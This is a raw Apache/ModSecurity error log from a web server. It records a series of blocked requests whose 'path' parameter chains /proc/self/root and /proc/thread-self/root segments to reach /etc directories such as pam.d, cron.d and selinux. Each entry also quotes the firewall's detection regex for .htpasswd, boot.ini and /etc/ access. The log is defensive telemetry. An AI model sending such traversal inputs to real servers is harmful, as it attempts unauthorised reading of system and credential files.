[Tue Mar 17 21:53:56.878444 2026] [:error] [pid 18211:tid 140411565680384] [client 74.7.241.31:58022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3pBcIZFNFgEhGGCRDhAAAA9U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:53:58.400481 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.241.31:36924] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3puw_le52K8_3pV143QAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:54:00.924076 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.241.31:36936] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3qMdf6f5d65gmYZRrJwAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:54:10.132925 2026] [proxy_fcgi:error] [pid 17972:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:43890] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:54:12.481651 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.241.31:34894] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3tMdf6f5d65gmYZRrOAAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:54:15.605443 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:34906] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3t-yqAr6etmhZHNpTQwAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:54:18.596829 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:44758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3uda6ubjKNq_cu4Yy3AAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:54:18.622398 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.241.31:37644] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3ugkwaGbbGflqUZCwIwAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:54:18.824966 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.241.31:37644] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3ugkwaGbbGflqUZCwJAAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:54:21.434836 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.241.31:37656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3vdY0UrI5A3LftIwruAAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:54:22.951659 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.241.31:37658] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3vtY0UrI5A3LftIwrvAAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:54:32.125780 2026] [proxy_fcgi:error] [pid 31803:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:44346] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:54:33.490654 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:53382] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3yda6ubjKNq_cu4Yy4QAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:54:37.359114 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.241.31:45876] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3zcdf6f5d65gmYZRrPwAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:54:39.563477 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.241.31:45892] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3z9Y0UrI5A3LftIwrwAAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:54:42.710320 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.241.31:45904] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn30eyqAr6etmhZHNpTVAAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:54:44.916987 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:45918] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn31OyqAr6etmhZHNpTVgAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:54:50.983346 2026] [:error] [pid 2598:tid 140411658000128] [client 74.7.241.31:36048] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn32hj0p0SRWAqcjGGmMAAAAwo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:54:54.125797 2026] [proxy_fcgi:error] [pid 2598:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:44738] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:54:55.573659 2026] [:error] [pid 2598:tid 140411632822016] [client 74.7.241.31:36052] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn33xj0p0SRWAqcjGGmNQAAAw0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:54:56.979574 2026] [:error] [pid 2598:tid 140411716749056] [client 74.7.241.31:36064] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn34Bj0p0SRWAqcjGGmOgAAAwM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:54:58.636758 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.241.31:32886] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn34tY0UrI5A3LftIwrxgAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:54:59.937456 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.241.31:32894] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn348df6f5d65gmYZRrRgAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:55:01.272718 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.241.31:32902] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn35dY0UrI5A3LftIwrxwAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:55:04.014282 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.241.31:32902] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn35dY0UrI5A3LftIwryAAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
